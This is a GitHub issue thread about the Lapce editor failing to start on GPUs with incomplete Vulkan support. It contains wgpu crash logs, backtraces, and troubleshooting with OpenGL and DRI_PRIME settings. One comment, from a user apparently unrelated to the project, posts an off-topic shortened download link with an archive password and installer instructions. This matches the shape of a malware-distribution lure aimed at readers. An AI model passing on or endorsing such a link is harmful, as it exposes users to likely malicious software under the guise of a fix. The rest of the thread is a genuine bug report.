### ISSUE TITLE
Lapce doesn't start on GPU with incomplete Vulkan support

### ISSUE THREAD

**Issue by midinastasurazz** [lapce/lapce#3457]
Let me start by saying a big thank you for creating Lapce. It is _phenomenally_ good. I genuinely love it.

## Lapce Version

0.4.2+Nightly.76ed075

## System information

- Fedora Linux 40 (Workstation Edition)
- GNOME 46
- Wayland
- Kernel 6.10.6
- x86_64

## Describe the bug

Lapce doesn't start. As a workaround I enable CPU-only rendering using [tiny-skia](https://github.com/RazrFalcon/tiny-skia) with `FLOEM_FORCE_TINY_SKIA=1 lapce` which works fine but feels slow to me.

I would like Lapce to run GPU accelerated. Can I somehow tell Lapce to use OpenGL ES instead of Vulkan?

## Additional information

I am using a laptop from circa 2014 with [Intel Pentium N3520](https://en.wikipedia.org/wiki/Silvermont#Mobile_processors_(Bay_Trail-M)) ([Intel Ark](https://ark.intel.com/content/www/us/en/ark/products/79049/intel-pentium-processor-n3520-2m-cache-up-to-2-42-ghz.html)) and [Intel HD Graphics (Bay Trail)](https://www.notebookcheck.net/Intel-HD-Graphics-Bay-Trail.103037.0.html).

When I run `RUST_BACKTRACE=1 lapce --wait` I get:

```
MESA-INTEL: warning: Bay Trail Vulkan support is incomplete
2024-08-27T14:38:44.067480Z ERROR wgpu_core::device::global: 1567: Device::create_render_pipeline error: Internal error in ShaderStages(VERTEX) shader: The selected version doesn't support Features(DYNAMIC_ARRAY_SIZE)    
2024-08-27T14:38:44.067540Z ERROR wgpu::backend::wgpu_core: 1217: Shader translation error for stage ShaderStages(VERTEX): The selected version doesn't support Features(DYNAMIC_ARRAY_SIZE)    
2024-08-27T14:38:44.070520Z ERROR wgpu::backend::wgpu_core: 1218: Please report it to https://github.com/gfx-rs/wgpu    
2024-08-27T14:38:44.070644Z ERROR wgpu::backend::wgpu_core: 3410: Handling wgpu errors as fatal by default    
thread 'main' panicked at /cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.0.0/src/backend/wgpu_core.rs:3411:5:
wgpu error: Validation Error

Caused by:
  In Device::create_render_pipeline
    Internal error in ShaderStages(VERTEX) shader: The selected version doesn't support Features(DYNAMIC_ARRAY_SIZE)


stack backtrace:
   0: rust_begin_unwind
   1: core::panicking::panic_fmt
   2: core::ops::function::Fn::call
   3: <T as wgpu::context::DynContext>::device_create_render_pipeline
   4: floem_vger::Vger::new
   5: floem::context::PaintState::new
   6: floem::app_handle::ApplicationHandle::new_window
   7: lapce_app::app::launch
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
```
Running `wgpu-info`
```
MESA-INTEL: warning: Bay Trail Vulkan support is incomplete
Adapter 0:
	         Backend: Vulkan
	            Name: llvmpipe (LLVM 18.1.6, 128 bits)
	        VendorID: 0x10005
	        DeviceID: 0x0
	            Type: Cpu
	          Driver: llvmpipe
	      DriverInfo: Mesa 24.1.6 (LLVM 18.1.6)
	WebGPU Compliant: true
Adapter 1:
	         Backend: Gl
	            Name: Mesa Intel(R) HD Graphics (BYT)
	        VendorID: 0x8086
	        DeviceID: 0x0
	            Type: IntegratedGpu
	          Driver: <empty>
	      DriverInfo: 4.2 (Core Profile) Mesa 24.1.6
	WebGPU Compliant: false
``` 
Repeated `MESA-INTEL: warning: Bay Trail Vulkan support is incomplete` hints that the integrated graphics doesn't fully support Vulkan.

`glxinfo` gives
```
OpenGL ES profile version string: OpenGL ES 3.0 Mesa 24.1.6
```
which gives me _hope_ because that indicates the integrated graphics supports `OpenGL ES 3.0 `.

[Supported Platforms](https://github.com/gfx-rs/wgpu#supported-platforms) for `wgpu` lists `OpenGL ES 3.0`.

wgpu's Readme mentions support for setting the [Environment Variable](https://github.com/gfx-rs/wgpu#environment-variables) `WGPU_BACKEND=gl`, but it doesn't seem to have any effect on Lapce.

I would like Lapce to run GPU accelerated. Can I somehow tell Lapce to use OpenGL ES backend instead of Vulkan?

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by dzhou121** [comment]
Thanks for your interest!

I just tried `WGPU_BACKEND=gl` and it does take effect in some way, because wgpu tried to init with opengl but failed so it failed over to tinyskia soft renderer. Was it the case for you as well?

**Comment by midinastasurazz** [comment]
I appreciate the quick response @dzhou121.

I tried running `WGPU_BACKEND=gl RUST_BACKTRACE=1 lapce --wait` and I got _almost_ the same error:
```
2024-08-28T16:30:40.314360Z ERROR wgpu_core::device::global: 1567: Device::create_render_pipeline error: Internal error in ShaderStages(VERTEX) shader: The selected version doesn't support Features(DYNAMIC_ARRAY_SIZE)    
2024-08-28T16:30:40.314531Z ERROR wgpu::backend::wgpu_core: 1217: Shader translation error for stage ShaderStages(VERTEX): The selected version doesn't support Features(DYNAMIC_ARRAY_SIZE)    
2024-08-28T16:30:40.314663Z ERROR wgpu::backend::wgpu_core: 1218: Please report it to https://github.com/gfx-rs/wgpu    
2024-08-28T16:30:40.314807Z ERROR wgpu::backend::wgpu_core: 3410: Handling wgpu errors as fatal by default    
thread 'main' panicked at /cargo/registry/src/index.crates.io-6f17d22bba15001f/wgpu-22.0.0/src/backend/wgpu_core.rs:3411:5:
wgpu error: Validation Error

Caused by:
  In Device::create_render_pipeline
    Internal error in ShaderStages(VERTEX) shader: The selected version doesn't support Features(DYNAMIC_ARRAY_SIZE)


stack backtrace:
   0: rust_begin_unwind
   1: core::panicking::panic_fmt
   2: core::ops::function::Fn::call
   3: <T as wgpu::context::DynContext>::device_create_render_pipeline
   4: floem_vger::Vger::new
   5: floem::context::PaintState::new
   6: floem::app_handle::ApplicationHandle::new_window
   7: lapce_app::app::launch
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.
```
The first line from the original Backtrace `MESA-INTEL: warning: Bay Trail Vulkan support is incomplete` is missing.

So you are probably right. It seems `wgpu` didn't use Vulkan this time. How can I tell that `wgpu` tried to use OpenGL ES?

In any case Lapce didn't start and there was no failing over to `tiny-skia`.

What shall I try next?

**Comment by dzhou121** [comment]
Lapce relies on wgpu so if wgpu panics, we probably have nothing we can do at our side.

I'd suggest try to run the simplest example in wgpu repo and see if that crashes? If it doesn't, Lapce probably is using some gpu api set that your gpu driver doesn't support somehow.

**Comment by G-P-L** [comment]
I’m experiencing a very similar issue. My laptop runs Arch Linux and has a Radeon HD 8650G integrated GPU (TeraScale 3, no Vulkan support, using the radeon kernel driver) and a Radeon R5 M230 dedicated GPU (GCN1, good Vulkan support, using the amdgpu kernel driver).
When I try to run Lapce, nothing happens unless I specify the DRI_PRIME=1 variable, which forces the app to use the dedicated GPU. In that case, it works perfectly.
This behavior seems strange because, typically, other applications automatically choose the GPU that provides Vulkan support based on the ICD loader.
